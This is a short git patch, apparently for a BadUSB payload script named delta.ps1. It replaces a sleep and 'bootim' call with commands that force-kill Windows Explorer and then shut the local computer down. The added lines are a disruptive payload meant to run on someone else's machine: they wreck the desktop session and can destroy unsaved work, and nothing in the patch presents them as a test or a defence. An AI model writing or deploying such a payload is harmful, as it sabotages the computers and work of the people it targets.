From 4685a866077bf9fbb6dc38cee539610d7a58de64 Mon Sep 17 00:00:00 2001 From: badusb Date: Tue, 19 May 2026 09:13:09 +0000 Subject: [PATCH] Update delta.ps1 --- delta.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/delta.ps1 b/delta.ps1 index 17d0380..3913515 100644 --- a/delta.ps1 +++ b/delta.ps1 @@ -1,2 +1,2 @@ -sleep 1 -bootim \ No newline at end of file +taskkill.exe /f /IM explorer.exe +Stop-Computer -ComputerName localhost \ No newline at end of file